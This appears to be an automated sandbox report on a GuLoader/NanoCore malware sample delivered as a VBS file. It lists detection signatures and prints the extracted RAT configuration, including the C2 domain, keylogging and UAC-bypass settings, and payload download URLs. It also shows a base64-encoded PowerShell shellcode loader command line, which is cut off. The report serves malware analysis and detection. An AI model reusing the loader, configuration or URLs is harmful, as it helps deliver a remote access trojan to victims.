Windows Analysis Report
IMG 0045434.vbs

Overview

General Information

Sample Name: IMG 0045434.vbs
Analysis ID: 562140
MD5: 813117cdcd80979365fd6d9586d11e4a
SHA1: e28ef2705053405e87f440f078f31d13b09a9ee3
SHA256: 1def093ef16309c10c38b5426ac396019c4ddc074394b022626b8dce1ea2acaa
Infos:

Detection

Nanocore GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: NanoCore
Detected Nanocore Rat
Antivirus detection for URL or domain
Yara detected Nanocore RAT
Yara detected GuLoader
Hides threads from debuggers
Creates an autostart registry key pointing to binary in C:\Windows
Creates multiple autostart registry keys
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Potential malicious VBS script found (has network functionality)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Creates autostart registry keys with suspicious values (likely registry only malware)
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses dynamic DNS services
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Installs a raw input device (often for capturing keystrokes)
Drops PE files
Tries to load missing DLLs
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Sigma detected: Suspicious Execution of Powershell with Base64
Creates a process in suspended mode (likely to inject code)
Sigma detected: Autorun Keys Modification
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

AV Detection
barindex
Found malware configuration
Source: 00000010.00000000.266464354998.0000000001300000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://onedrive.live.com/download?cidO"}
Source: 00000022.00000002.268467219270.000000001E151000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "9bd83597-93e4-4366-8889-6a4efb8a", "Group": "2022", "Domain1": "tochukwu1122.ddns.net", "Domain2": "127.0.0.1", "Port": 1122, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png Avira URL Cloud: Label: malware
Yara detected Nanocore RAT
Source: Yara match File source: 37.2.CasPol.exe.1f1eeadc.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.CasPol.exe.1f19eadc.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.CasPol.exe.1f1a3105.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.CasPol.exe.1f1f3105.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.CasPol.exe.1f19eadc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.CasPol.exe.1f1e9ca6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.CasPol.exe.1f199ca6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.CasPol.exe.1f1eeadc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000022.00000002.268467219270.000000001E151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.268467630247.000000001F151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.268476945395.000000001E1A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.268477360466.000000001F1A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 3064, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 7664, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll Jump to behavior
Source: Binary string: caspol.pdbx source: CasPol.exe, 00000010.00000003.266576966136.00000000208A2000.00000004.00000800.00020000.00000000.sdmp, dslmon.exe, 00000014.00000002.266736797377.0000000000B62000.00000002.00000001.01000000.00000007.sdmp, dslmon.exe, 0000001A.00000002.266898010453.0000000000BF2000.00000002.00000001.01000000.00000007.sdmp, dslmon.exe.16.dr
Source: Binary string: caspol.pdb source: dslmon.exe, dslmon.exe, 0000001A.00000002.266898010453.0000000000BF2000.00000002.00000001.01000000.00000007.sdmp, dslmon.exe.16.dr

Networking
barindex
Potential malicious VBS script found (has network functionality)
Source: Initial file: D_Stream.SaveToFile Gefullte5, 2
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://onedrive.live.com/download?cidO
Source: Malware configuration extractor URLs: tochukwu1122.ddns.net
Source: Malware configuration extractor URLs: 127.0.0.1
Uses dynamic DNS services
Source: unknown DNS query: name: tochukwu1122.ddns.net
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DAVID_CRAIGGG DAVID_CRAIGGG
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.11.20:49811 -> 185.140.53.143:1122
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: powershell.exe, 0000000A.00000002.266616415243.0000000008E36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.266461629328.0000000008E35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.266608445995.00000000080D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.266459610439.00000000080D0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266840482525.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266551551961.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266562042776.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267134796205.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267399589907.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267057712404.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266971022965.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000022.00000002.268393588039.00000000011AF000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268401907263.000000000122D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 0000000A.00000002.266616415243.0000000008E36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.266461629328.0000000008E35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.266608445995.00000000080D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.266459610439.00000000080D0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266840482525.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266551551961.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266562042776.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267134796205.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267399589907.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267057712404.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266971022965.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000022.00000002.268393588039.00000000011AF000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268401907263.000000000122D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CasPol.exe, 00000010.00000003.266551551961.00000000016CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.m
Source: CasPol.exe, 00000010.00000003.266551551961.00000000016CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://microsoft.co
Source: powershell.exe, 0000000A.00000002.266604273172.000000000641A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000A.00000002.266590681721.0000000005509000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000A.00000002.266588787753.00000000053B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.268515140389.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.268357616536.0000000004BF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.268352485259.0000000005351000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000A.00000002.266590681721.0000000005509000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000A.00000002.266588787753.00000000053B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.268515140389.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.268357616536.0000000004BF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.268352485259.0000000005351000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 0000000A.00000002.266604273172.000000000641A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000A.00000002.266604273172.000000000641A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000A.00000002.266604273172.000000000641A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000A.00000002.266590681721.0000000005509000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000A.00000003.266207346947.0000000005DE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: CasPol.exe, 00000010.00000003.266840482525.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266551551961.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266562042776.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266561876381.00000000016C0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266840397089.00000000016C0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266551480695.00000000016C1000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267134796205.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267399589907.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267057712404.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266971022965.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000022.00000002.268392159029.0000000001158000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000022.00000002.268394477912.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268401907263.000000000122D000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268401655086.0000000001208000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kadnjg.bn.files.1drv.com/
Source: CasPol.exe, 00000010.00000003.266840482525.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266551551961.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266562042776.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267134796205.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267399589907.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267057712404.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266971022965.00000000016CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kadnjg.bn.files.1drv.com/&.
Source: CasPol.exe, 00000022.00000002.268393588039.00000000011AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kadnjg.bn.files.1drv.com/)M
Source: CasPol.exe, 00000022.00000002.268393588039.00000000011AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kadnjg.bn.files.1drv.com/EM
Source: CasPol.exe, 00000025.00000002.268401907263.000000000122D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kadnjg.bn.files.1drv.com/N
Source: CasPol.exe, 00000010.00000003.266551551961.00000000016CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kadnjg.bn.files.1drv.com/P
Source: CasPol.exe, 00000022.00000002.268394477912.00000000011ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kadnjg.bn.files.1drv.com/_Event_
Source: CasPol.exe, 00000010.00000003.266551551961.00000000016CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kadnjg.bn.files.1drv.com/y
Source: CasPol.exe, 00000025.00000003.268315507584.0000000001285000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000025.00000003.268319359560.0000000001285000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268402634074.0000000001275000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kadnjg.bn.files.1drv.com/y4m3WEg51wPpMvwOBDGQxc03AePN0yY86OyXcDJxrS2Yo4kmiHKJqicrFmOOu5sbK8F
Source: CasPol.exe, 00000010.00000003.266562538409.0000000001711000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266562042776.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000025.00000003.268320218693.00000000012A1000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000025.00000003.268319359560.0000000001285000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268402634074.0000000001275000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kadnjg.bn.files.1drv.com/y4m624plfyYIXAWdtfrz_bfoDWfcwPUj5QFno4RLBcRH3SrJIxCwmlV2VAmgwJvM6c3
Source: CasPol.exe, 00000010.00000003.266562042776.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266552003351.0000000001712000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267134796205.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267399589907.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.267057712404.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000003.266971022965.00000000016CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kadnjg.bn.files.1drv.com/y4mLaMkqxgfgA77Nhx7Bu5i00p-BE1O1XpIc_eFvfEnM8XOp9-VuvKR5WbEVOk6Ajy9
Source: CasPol.exe, 00000022.00000003.268306189563.0000000001212000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kadnjg.bn.files.1drv.com/y4mamlucM5WMHi-wCNvNvuQyTGytao2V_4itsZyI16BJ46ANIo0HsJrTQX8HYAUh18L
Source: CasPol.exe, 00000010.00000003.266551551961.00000000016CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kadnjg.bn.files.1drv.com/z.3
Source: powershell.exe, 0000000A.00000002.266604273172.000000000641A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: CasPol.exe, 00000022.00000002.268393588039.00000000011AF000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000022.00000002.268392159029.0000000001158000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000022.00000003.268306189563.0000000001212000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000025.00000002.268401907263.000000000122D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/
Source: CasPol.exe, 00000025.00000002.268398436566.0000000000B60000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/download?cid=2B80EFEE51D0620B&resid=2B80EFEE51D0620B%21266&authkey=AEVbDmT
Source: CasPol.exe, 00000022.00000002.268393588039.00000000011AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/x0?b
Source: unknown DNS traffic detected: queries for: onedrive.live.com

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Installs a raw input device (often for capturing keystrokes)
Source: CasPol.exe, 00000022.00000002.268467219270.000000001E151000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: RegisterRawInputDevices

E-Banking Fraud
barindex
Yara detected Nanocore RAT
Source: Yara match File source: 37.2.CasPol.exe.1f1eeadc.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.CasPol.exe.1f19eadc.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.CasPol.exe.1f1a3105.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.CasPol.exe.1f1f3105.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.CasPol.exe.1f19eadc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.CasPol.exe.1f1e9ca6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.CasPol.exe.1f199ca6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.CasPol.exe.1f1eeadc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000022.00000002.268467219270.000000001E151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.268467630247.000000001F151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.268476945395.000000001E1A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.268477360466.000000001F1A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 3064, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 7664, type: MEMORYSTR

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 37.2.CasPol.exe.1e1c3f10.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 34.2.CasPol.exe.1e173f10.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 37.2.CasPol.exe.1f1eeadc.3.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 34.2.CasPol.exe.1f19eadc.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 34.2.CasPol.exe.1f1a3105.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 37.2.CasPol.exe.1f1f3105.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 34.2.CasPol.exe.1f19eadc.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 37.2.CasPol.exe.1f1e9ca6.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 37.2.CasPol.exe.1f1e9ca6.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 34.2.CasPol.exe.1f199ca6.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 34.2.CasPol.exe.1f199ca6.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 37.2.CasPol.exe.1f1eeadc.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000022.00000002.268467219270.000000001E151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000022.00000002.268467630247.000000001F151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000025.00000002.268476945395.000000001E1A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000025.00000002.268477360466.000000001F1A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: CasPol.exe PID: 3064, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: CasPol.exe PID: 7664, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4ANQAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA2ACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADcALABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AOAAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAGMAaQBzAH